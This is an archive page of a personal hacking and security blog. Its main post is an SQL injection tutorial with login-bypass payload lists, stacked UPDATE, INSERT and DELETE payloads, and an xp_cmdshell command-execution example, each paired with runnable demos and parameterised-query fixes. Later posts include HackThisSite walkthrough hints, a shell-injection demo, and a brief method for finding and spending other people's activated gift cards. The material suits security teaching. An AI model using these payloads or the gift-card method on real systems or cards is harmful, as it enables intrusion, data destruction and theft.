Archive for the ‘Hacking’ Category

Structured Query Language (SQL) Injection

July 31st, 2007

A major attack vector web programmers sometimes forget about is input handling. If user input is placed directly into a SQL statement without being validated, or better, passed as a bound parameter, attackers can submit SQL of their own to the server. That SQL can make the server return more data than it should, modify records, or delete entire tables.

SQL injection points occur any time user input reaches a query without being handled correctly. The most common points of attack are login pages, search pages and URL query strings, but attacks are not limited to these entry points: cookies, hidden form fields and HTTP headers reach the database just as easily. All user input needs to be treated as untrusted. The reliable defence is parameterised queries (prepared statements) combined with allow-list validation of the input; escaping quotes by hand is error-prone and is where most home-grown "cleansing" code goes wrong.

SQL Injection Basics

SQL injection is simple in theory: the attacker finds an input that the application trusts and passes into a SQL query. Once a vulnerable input is found, the goal is to force the query's condition to evaluate true no matter what the programmer intended.

The most common way to force a SQL statement to evaluate true is to add ' OR 1=1-- to a vulnerable input.

Code:
' OR 1=1--
Explanation:
' : Closes the string literal that the vulnerable input is being compared against.
OR : A logical operator that joins a second condition. Because it is an OR, the whole WHERE clause can still evaluate to true when the first condition fails on the now-empty string, provided the second condition is true.
1=1 : Since 1 always equals 1, this condition is always true.
-- : Starts a comment, so the SQL server ignores everything after the two dashes, including the rest of the programmer's query (for example the password check). Note that MySQL only treats -- as a comment when it is followed by whitespace, and also accepts #; MS SQL Server accepts a bare --, which is why the variations below come in several comment styles.
Here are a few variations along the same lines as above. They differ in whether the target string literal is single- or double-quoted, whether the condition is wrapped in parentheses, whether the column is numeric (no quote needed at all), whether the expression is closed with a comment or by re-using the application's own closing quote, and whether a known username (here "admin" or "hack") is placed in front:

admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hack" or "a"="a
hack" or 1=1 --
hack' or 1=1 --
hack' or 'a'='a
hack') or ('a'='a
hack") or ("a"="a
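The login bypass described above, run against a real (in-memory SQLite) database, as an added example that is not part of the original post. The users table, the two accounts and the query text are constructed for this demonstration; the vulnerable function builds the query by string concatenation exactly as the post describes, and the parameterised version beside it shows why bound parameters stop the same payloads.

```python
"""Login bypass with ' OR 1=1-- against a string-built query, beside the
parameterised query that defeats it.  Added example with a constructed
users table; nothing here is the original post's code."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # In-memory database with a constructed users table and two accounts.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "crackable", "letmein")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the query by concatenation, so quotes, OR and -- typed by the
    user become part of the SQL the server parses."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the driver sends the values separately from the
    statement text, so quotes and comment markers in them stay data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    # -- comments out the password check and 1=1 is true for every row,
    # so the "login" matches every account in the table.
    print(vulnerable_login(conn, "' OR 1=1--", "anything"))   # ['admin', 'crackable']
    # The admin'-- variant targets one known account instead of all of them.
    print(vulnerable_login(conn, "admin'--", "anything"))     # ['admin']
    # The same payloads against the parameterised query match nothing.
    print(safe_login(conn, "' OR 1=1--", "anything"))         # []
    print(safe_login(conn, "admin", "s3cret"))                # ['admin']
```

SQLite accepts a bare `--` comment like MS SQL Server does; against MySQL the same payload needs a space after the dashes or `#` instead, which is the only change required to reuse the vulnerable function there.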

Update Data in Database

The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location, provided the database and driver accept more than one statement per request (MS SQL Server does; MySQL's classic single-query API does not, so a second statement after the semicolon is simply a syntax error there). The following code sample shows how a password can be changed if the table name and an account name are known.

Code:
'; UPDATE users SET password = 'hacked' WHERE username = 'crackable'--

The above code closes the string the input was sitting in, ends the original query with a semicolon, and appends an UPDATE on the users table for the row whose username is crackable. SET changes that row's password field to hacked, and the trailing -- comments out whatever the application appends after the input.

Insert Data into Database

Inserting data into a database is very similar to updating a table. As with the update, this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example assumes that the attacker knows the table name and its general structure (column names and which columns are required).

Code:
'; INSERT INTO users (id, username, password, details) VALUES (1203, 'myaccount', 'mypassword', 'NA')--

The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating a new account is less likely to be noticed than changing the password of an existing one, because no legitimate user is locked out. If enough table information can be gathered to insert a new account into the users table, that is preferred over updating an existing account. If the table structure cannot be obtained, the next best thing is to change a user's password with an update.

Deleting Data from a Database

Deleting data from a database is very similar to updating and inserting data in a table. As with the update and the insert, this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know only the table name.

Code:
'; DELETE FROM users--

The above code sample deletes every row from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. It will be discovered very quickly, since users will no longer be able to log into the website.
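The three stacked-query payloads above (update, insert, delete) run end to end against an in-memory SQLite table, as an added example that is not part of the original post. The users table is constructed for the demo. The vulnerable search passes its string-built query to `executescript()`, which executes every statement it finds and so behaves like a driver that allows stacked queries; the second search uses `execute()`, which accepts exactly one statement and therefore rejects the same payloads, which is the driver-support caveat noted above.

```python
"""Stacked-query injection ('; UPDATE ... --) through a search box, against
a driver that runs multiple statements and against one that refuses them.
Added example with a constructed users table; not the original post's code."""
import sqlite3

# Payloads with the same shape as the ones in the post.
UPDATE_PAYLOAD = "'; UPDATE users SET password = 'hacked' WHERE username = 'crackable'--"
INSERT_PAYLOAD = ("'; INSERT INTO users (id, username, password, details) "
                  "VALUES (1203, 'myaccount', 'mypassword', 'NA')--")
DELETE_PAYLOAD = "'; DELETE FROM users--"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, details TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'crackable', 'original', 'NA')")
    conn.commit()
    return conn


def search_multi(conn: sqlite3.Connection, term: str) -> None:
    """Vulnerable search whose driver call runs every statement in the string.
    The semicolon in the input ends the SELECT and starts the attacker's own
    statement; the trailing -- swallows the application's closing quote."""
    conn.executescript("SELECT id FROM users WHERE username = '" + term + "'")


def search_single(conn: sqlite3.Connection, term: str):
    """Same string-built query, but execute() only runs one statement and
    raises when more text follows it, so the stacked statement never runs.
    (Still injectable for UNION/OR style payloads; only stacking is blocked.)"""
    try:
        rows = conn.execute("SELECT id FROM users WHERE username = '" + term + "'")
        return [r[0] for r in rows]
    except (sqlite3.Warning, sqlite3.Error) as exc:   # Warning in old Pythons, ProgrammingError in new
        return "rejected: " + str(exc)


def password_of(conn: sqlite3.Connection, username: str):
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def usernames(conn: sqlite3.Connection) -> list:
    return [r[0] for r in conn.execute("SELECT username FROM users ORDER BY id")]


if __name__ == "__main__":
    conn = make_db()
    search_multi(conn, UPDATE_PAYLOAD)
    print(password_of(conn, "crackable"))   # hacked
    search_multi(conn, INSERT_PAYLOAD)
    print(usernames(conn))                  # ['crackable', 'myaccount']
    search_multi(conn, DELETE_PAYLOAD)
    print(usernames(conn))                  # []

    conn = make_db()
    print(search_single(conn, UPDATE_PAYLOAD))   # rejected: ...
    print(password_of(conn, "crackable"))        # original
```

The `search_single` result is the important caveat: a driver that refuses stacked statements stops the UPDATE, INSERT and DELETE payloads, but it does nothing against the `' OR 1=1--` style bypass in the previous section, because that payload is a single statement. Only parameterised queries close both.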

Remote Execution with SQL Injection (MS SQL)

SQL injection can be very powerful. This is an example of an injection that leads to remote command execution. On older default installations (SQL Server 2000) the service ran as Local System, a built-in account with full control of the machine; it is not the Administrator account, but locally it is at least as powerful. With the following code, extended stored procedures such as master..xp_cmdshell can be called, which lets the attacker run operating-system commands on the server under the service account, as if sitting at the box. Note that since SQL Server 2005 xp_cmdshell is disabled by default and must be switched on through sp_configure, and the service normally runs under a less privileged account, so this step is not always available.

Code:
'; exec master..xp_cmdshell 'ping 104.12.45.25'--

The semicolon ends the current SQL query and allows a new command to follow. Because the output of xp_cmdshell is usually not shown in the web page, success is verified out of band: run a packet sniffer on 104.12.45.25 and watch for ICMP echo requests. If echo requests arrive at 104.12.45.25 from the SQL server's address, the stored procedure executed. Where ICMP is filtered at the perimeter, a DNS lookup against a name server the attacker controls serves the same purpose.

Hacking, Security

SHA-1 cracked

January 23rd, 2007

An article in the Epoch Times (a Chinese newspaper) describes a brilliant Chinese professor who, with her team, has broken her fifth cryptographic scheme in ten years, the latest being SHA-1. SHA-1 is a hash function rather than an encryption scheme, and "cracked" here means a collision attack substantially faster than the 2^80 brute-force bound, not a way to recover the data behind a hash. As a result, the U.S. government and major corporations are expected to phase the algorithm out within the next few years.

Read the full article here.

Hacking, Security

Hacking Traffic Lights

January 10th, 2007

I found this article on SC Magazine that reminded me of the movie Hackers, because in the movie the hackers hack into the street lights so they have all green lights. Here is the article, which can be found at SC Magazine.

Ericka Chickowski Jan 9 2007 18:29

Two Los Angeles municipal traffic engineers were arraigned and charged with hacking city systems to disable traffic lights, all in connection with a labor dispute.

The two men, Gabriel Murillo and Kartik Patel, were charged by the Los Angeles district attorney’s newly-formed High Technology Crimes Division. The district attorney alleged that the men illegally accessed the city’s Automated Traffic Surveillance Center last August and disconnected four signal control boxes at key intersections.

Murillo allegedly accessed the system and found a way to block other managers from fixing the changes. Prosecutors reported it took four days to repair the signals.

According to the DA's office, the disruption occurred hours before a job action by members of the Engineers and Architects Association, a union representing employees, such as Murillo and Patel, who run the city's traffic center.

“This amounts to sabotage and is not to be tolerated no matter what the dispute or cause,” Los Angeles District Attorney Steve Cooley said.

Hacking, Security

HD DVD and Blu-ray AACS Copy Protection

December 29th, 2006

Earlier this month a hacker named muslix64 claimed to have cracked the AACS protection used in HD DVD and Blu-ray discs. Muslix64's hack first surfaced on December 18 on YouTube, showing the decryption of an HD DVD movie and promising more details soon.


Muslix64 posted a link to his source code at the Doom9 forum.

According to reports, the software is rough and only supports a handful of HD DVD titles, but it does seem to bypass the AACS protection. The software enables users to "back up" high-definition video from HD DVD and Blu-ray discs to a hard drive. Reliable playback of the saved files has not been confirmed.

As a movie collector I am hoping the MPAA will learn that copy protection is not working. It is a long shot, but maybe the MPAA will look at what customers want, which is not copy protection, and offer open media at reasonable prices. This would allow customers to back up purchased media and freely add it to a home theater PC or iPod without cracking the copy protection. I know this is a long shot, but I am hopeful. I believe this would not increase piracy and would have a positive effect on profits.

Hacking

Top 100 Network Security Tools

December 28th, 2006

I have read that you need to know security tools if you are going to break into the IT/network security field. I have found this website: http://sectools.org/. The site ranks and updates the top 100 network security tools. It seems like a great place to see which tools are on the rise and which are falling out of popularity.

After reviewing the list I noticed that I have used several of the tools. Most of the tools tend to be either free or open source. It is not realistic for me to learn and master all 100 tools. I plan to move down the list one at a time, starting at 1 and going to 25. This will allow me to master the popular tools and keep up with changes in the industry.

Hacking, Security

Hacking Gift Cards

December 9th, 2006

I read a recent post that detailed how to hack gift cards. It shocked me how insecure the gift cards are. I hope that posts detailing how to hack gift cards will bring about a change in the security of new cards.

You go to a store that has gift cards on display and check whether the serial number is shown on the back. Some cards cover the number. If the number is not covered, you write down the serial numbers of the cards. You then check whether a card has been activated by checking its validity via the phone number or the internet. Once you find an active card you can purchase things online with your new gift card.

Hacking, Security

HackThisSite.org Basic Web Level 7

December 5th, 2006

In this level our background information is:

This time Network Security Sam has saved the unencrypted level7 password in an obscurely named file saved in this very directory. In other unrelated news, Sam has set up a script that returns the output from the UNIX cal command. Here is the script: Enter the year you wish to view and hit 'view'.

This is a fun little level; it shows how you can inject UNIX commands into a poorly written Perl script. What Sam has done is create an obscurely named PHP script that holds an unencrypted password. Sam is showing off his talent by creating a calendar program written in Perl. When used correctly the Perl script returns a calendar for the year you type in the text box.

Hint: You will need more than one UNIX command to pass this level. Think about how you enter more than one command on a single shell line, and which commands you will need to list the files. You will need to change directories and list the files.
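The class of bug this level exercises, shown in Python as an added example; the level's own script is Perl and is not reproduced here. The `echo` command stands in for `cal` so the block runs anywhere, and "2007; echo INJECTED" is a constructed payload. The vulnerable function hands the whole string to the shell, which is what Perl's one-argument `system("cal $year")` does; the fixed version validates the year against an allow-list and passes an argument list so no shell ever parses the input, the same guarantee Perl's list form `system("cal", $year)` gives.

```python
"""Shell command injection through a 'year' parameter, and the two fixes
(allow-list validation, argv list instead of a shell string).  Added
example; `echo` is a constructed stand-in for the level's `cal` script."""
import re
import subprocess


def run_vulnerable(year: str) -> str:
    # shell=True passes the string to /bin/sh, which treats ';' as a command
    # separator, so "2007; echo INJECTED" runs a second command.
    out = subprocess.run("echo year=" + year, shell=True,
                         capture_output=True, text=True)
    return out.stdout


def run_argv(year: str) -> str:
    # No shell involved: the whole value is one argument, so ';' is literal.
    out = subprocess.run(["echo", "year=" + year],
                         capture_output=True, text=True)
    return out.stdout


def run_safe(year: str) -> str:
    # Allow-list the input first (a year is 1-4 digits), then use the argv
    # form.  Both layers: validation catches junk, argv stops interpretation.
    if not re.fullmatch(r"[0-9]{1,4}", year):
        raise ValueError("year must be 1-4 digits")
    return run_argv(year)


def safe_or_error(year: str) -> str:
    try:
        return run_safe(year)
    except ValueError as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    payload = "2007; echo INJECTED"
    print(run_vulnerable(payload), end="")   # year=2007 / INJECTED on two lines
    print(run_argv(payload), end="")         # year=2007; echo INJECTED (one literal line)
    print(safe_or_error(payload))            # rejected: year must be 1-4 digits
    print(safe_or_error("2007"), end="")     # year=2007
```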

HackThisSite Levels, Hacking

HackThisSite.org Basic Web Level 6

December 4th, 2006

In this level our background information is:

Network Security Sam has encrypted his password. The encryption system is publicly available and can be accessed with this form:

You have recovered his encrypted password. It is: e39h;;6=

Decrypt the password and enter it below to advance to the next level.

In this level Sam has changed several things. He has encrypted the password, and we have somehow gotten our hands on the encrypted password for this level. Sam has included an encryption form so you can test a password of your own and compare the result with the encrypted password we have found.

Hint: Get yourself an ASCII table and use the encrypt form to crack the encryption. Type a sample password in the encryption form and use the results to figure out the crypto being used.
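The hint's method carried through in code, as an added example that is not part of the original post and does not reveal the level's scheme: `toy_encrypt` is a constructed stand-in for the encryption form, chosen here to shift each character by an amount that depends only on its position. The attacker treats the form as an oracle, encrypts a known probe, reads the per-position difference off the ASCII table, checks that the difference table is the same for a second probe (otherwise the model is wrong), and then inverts it on a recovered ciphertext produced by the same stand-in.

```python
"""Characterising an encryption form with chosen plaintext and an ASCII
table, then decrypting with the recovered offsets.  Added example; the
oracle below is a constructed stand-in, not HackThisSite's algorithm."""


def toy_encrypt(plaintext: str) -> str:
    """Constructed stand-in oracle: shift character i by a secret that depends
    only on i.  An attacker cannot see this function, only call it."""
    secret = [3, 1, 4, 1, 5, 9, 2, 6]
    return "".join(chr(ord(c) + secret[i % len(secret)]) for i, c in enumerate(plaintext))


def recover_offsets(oracle, probe: str) -> list:
    """Chosen-plaintext step: offset[i] = ord(cipher[i]) - ord(probe[i]),
    which is exactly what reading the two strings off an ASCII table gives."""
    cipher = oracle(probe)
    return [ord(c) - ord(p) for p, c in zip(probe, cipher)]


def model_holds(oracle, probes) -> bool:
    """Sanity check before trusting the offsets: if the shift depends only on
    position, every probe of the same length must yield the same table."""
    tables = [recover_offsets(oracle, p) for p in probes]
    return all(t == tables[0] for t in tables)


def decrypt_with_offsets(ciphertext: str, offsets: list) -> str:
    """Invert the shift using the recovered per-position offsets."""
    return "".join(chr(ord(c) - offsets[i % len(offsets)]) for i, c in enumerate(ciphertext))


if __name__ == "__main__":
    probes = ["aaaaaaaa", "ABCDEFGH", "12345678"]   # constructed test passwords
    offsets = recover_offsets(toy_encrypt, probes[0])
    print(offsets)                                  # [3, 1, 4, 1, 5, 9, 2, 6]
    print(model_holds(toy_encrypt, probes))         # True
    recovered = toy_encrypt("p4ssw0rd")             # constructed "recovered" ciphertext
    print(decrypt_with_offsets(recovered, offsets))  # p4ssw0rd
```

If `model_holds` came back False the cipher would depend on the plaintext as well as the position, and the next probe to try is one that varies a single character at a time.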

HackThisSite Levels, Hacking

HackThisSite.org Basic Web Level 5

December 2nd, 2006

In this level our background information is:

Sam has gotten wise to all the people who wrote their own forms to get the password. Rather than actually learn the password, he decided to make his email program a little more secure.

This level is very similar to level 4. The method you used in level 4 may still work in level 5. All in all, this level should not take you very long.

Hint: How can you change the email address in the script to your own email address? I went with a quick and simple JavaScript injection method. I will post another link here after I finish my JavaScript injection post.

HackThisSite Levels, Hacking

HackThisSite.org Basic Web Level 4

November 30th, 2006

In this level our background information is:

This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script:

In this level Sam has made several changes to his login script. As you can see from the background, he has now hardcoded the password. But this time he created a script to email him the password because it is long and complex. How are you going to exploit this script to get to the next level?

Hint: How can you change the email address in the script to your own email address? There are several ways to do this; which will you find?

HackThisSite Levels, Hacking